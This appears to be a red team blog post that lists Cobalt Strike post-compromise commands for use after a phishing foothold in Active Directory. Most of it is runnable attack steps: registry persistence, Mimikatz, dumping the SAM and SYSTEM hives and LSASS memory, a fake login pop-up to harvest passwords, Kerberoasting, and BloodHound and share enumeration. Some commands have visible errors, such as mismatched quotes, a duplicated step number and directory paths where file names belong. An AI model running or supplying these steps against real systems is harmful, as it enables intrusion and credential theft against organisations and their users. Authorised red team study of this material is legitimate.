Red Team Play-book - Initial Enumeration

Sometimes the first shell or beacon or agent you receive back from a successful phishing attempt can be the perfect opportunity to get the lay of the land and extract as much useful information as you can in the event the organization's SOC locks you out after a short period of time.

The following is a non-exhaustive list of commands that you could run through Cobalt Strike to achieve various tasks immediately after compromise.

I have performed these commands using Cobalt Strike in a tiny Active Directory environment of just a DC and a workstation but obviously you can run these in a much larger enterprise environment and yield better results.

  1. Persistence

Using Zonksec's aggressor script which can be found on his github here, it is a simple process. Just load the script in Cobalt Strike, type the following command and select the listener. It will drop a batch file in C:\Users\Public\:

persistence Add RegKeyRun

2. Get Gal (Off-line *Office* Address Book)

Go to [Beacon] -> Explore -> File Browser


Then view download the .oab files

3. Get "Active" AD Computers and some information about them

powershell-import /path/to/PowerView.ps1
powershell Get-NetComputers -LDAPFilter ‘(!(userAccountControl:1.2.840.113556.1.4.803:=2))’ -Properties operatingSystem,operatingSystemServicePack,operatingSystemVersion,servicePrincipalName

4. Get "Active" AD Users, and information about them

powershell-import /path/to/Powerview.ps1
powershell Get-DomainUser -LDAPFilter `(!userAccountControl:1.2.840.113556.1.4.803:=2) -Properties distinguishedname,samaccountname,pwdlastset,userPrincipalName,mail,userWorkstations,memberOf`

5. Gather basic system information (script can be found here).

shell systeminfo
powershell-import /path/to/Invoke-HostEnum.ps1
powershell Invoke-HostEnum -Local -Domain

6. Privilege Escalation

powershell-import /path/to/PowerUp.ps1
powershell Invoke-AllChecks

7. (Assuming System) Run Mimikatz

Right Click on Beacon > Access > Run Mimikatz

8. if user credentials still required, ask for credentials via pop-up. Download script from here.

powershell-import /path/to/Invoke-LoginPrompt.ps1
powershell Invoke-LoginPrompt

8. (Assuming System) dump HKLM\SYSTEM and HKLM\SAM to get local accounts

shell reg.exe save hklm\sam c:\temp\
shell reg.exe save hklm\security c:\temp\
shell reg.exe save hklm\system c:\temp\

9. (Assuming System) Get LSA secrets

powershell-import /path/to/Out-Minidump.ps1
powershell Get-Process lsass | Out-Minidump -DumpFilePath C:\Windows\Temp

10. Kerberoast SPN's in local Domain - you can find the raw script here:

powershell-import /path/to/autokerberoast.ps1
powershell Invoke-AutoKerberoast

(the domain is not configured with any SPNs)

11. Run SharpHound - you can download the binary from here:

powershell-import /path/to/Sharphound.ps1
powershell Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -CompressData -RemoveCSV

Then download the generated zip file.

12. Check Share Access:

powershell-import /path/to/PowerView.ps1
powershell Invoke-ShareFinder -ExcludePrint -ExcludeIPC -CheckShareAccess